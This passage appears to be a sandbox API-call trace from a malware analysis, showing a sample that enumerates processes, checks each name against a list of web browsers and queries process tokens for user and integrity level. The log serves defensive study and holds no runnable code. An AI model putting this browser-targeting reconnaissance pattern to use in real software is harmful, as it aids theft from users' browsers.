(lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0243.202] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0243.202] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0243.202] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0243.202] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0243.202] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0243.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0243.202] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.202] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.202] GetLastError () returned 0x7a [0243.202] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.202] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.202] CloseHandle (hObject=0x340) returned 1 [0243.202] CloseHandle (hObject=0x548) returned 1 [0243.202] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.202] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.202] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.202] GetLastError () returned 0x7a [0243.203] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.203] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.203] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.203] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0243.203] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0243.203] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0243.203] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0243.203] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0243.203] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0243.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0243.203] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.203] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.203] GetLastError () returned 0x7a [0243.203] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.203] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.203] CloseHandle (hObject=0x340) returned 1 [0243.203] CloseHandle (hObject=0x548) returned 1 [0243.203] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.203] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.203] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.203] GetLastError () returned 0x7a [0243.204] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.204] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.204] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.204] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0243.204] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0243.204] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0243.204] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0243.204] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0243.204] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0243.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0243.204] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.204] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.204] GetLastError () returned 0x7a [0243.204] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.204] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.204] CloseHandle (hObject=0x340) returned 1 [0243.204] CloseHandle (hObject=0x548) returned 1 [0243.204] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.204] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.204] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.204] GetLastError () returned 0x7a [0243.205] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.205] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.205] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.205] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.205] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0243.205] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.205] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.205] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.205] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0243.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0243.205] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.205] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.205] GetLastError () returned 0x7a [0243.205] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.205] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.205] CloseHandle (hObject=0x340) returned 1 [0243.205] CloseHandle (hObject=0x548) returned 1 [0243.205] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.205] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.205] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.205] GetLastError () returned 0x7a [0243.206] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.206] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.206] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.206] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0243.206] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0243.206] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0243.206] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0243.206] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0243.206] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0243.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0243.206] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.206] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.206] GetLastError () returned 0x7a [0243.206] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.206] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.206] CloseHandle (hObject=0x340) returned 1 [0243.206] CloseHandle (hObject=0x548) returned 1 [0243.206] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.206] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.206] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.206] GetLastError () returned 0x7a [0243.207] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.207] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.207] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.207] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.207] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0243.207] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.207] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.207] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.207] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0243.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0243.207] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.207] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.207] GetLastError () returned 0x7a [0243.207] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.207] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.207] CloseHandle (hObject=0x340) returned 1 [0243.207] CloseHandle (hObject=0x548) returned 1 [0243.207] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.207] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.207] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.207] GetLastError () returned 0x7a [0243.208] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.208] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.208] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.208] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.208] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0243.208] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.208] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.208] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.208] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0243.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0243.208] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.208] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.208] GetLastError () returned 0x7a [0243.208] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.208] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.208] CloseHandle (hObject=0x340) returned 1 [0243.208] CloseHandle (hObject=0x548) returned 1 [0243.208] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.208] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.208] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.208] GetLastError () returned 0x7a [0243.209] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.209] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.209] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.209] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.209] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.209] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.209] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.209] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.209] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0243.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0243.209] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.209] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.209] GetLastError () returned 0x7a [0243.209] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.209] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.209] CloseHandle (hObject=0x340) returned 1 [0243.209] CloseHandle (hObject=0x548) returned 1 [0243.209] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.209] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.209] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.209] GetLastError () returned 0x7a [0243.210] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.210] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.210] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.210] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0243.210] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0243.210] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0243.210] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0243.210] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0243.210] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0243.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0243.210] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.210] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.210] GetLastError () returned 0x7a [0243.210] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.210] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.210] CloseHandle (hObject=0x340) returned 1 [0243.210] CloseHandle (hObject=0x548) returned 1 [0243.210] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.210] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.210] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.210] GetLastError () returned 0x7a [0243.211] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.211] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.211] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), 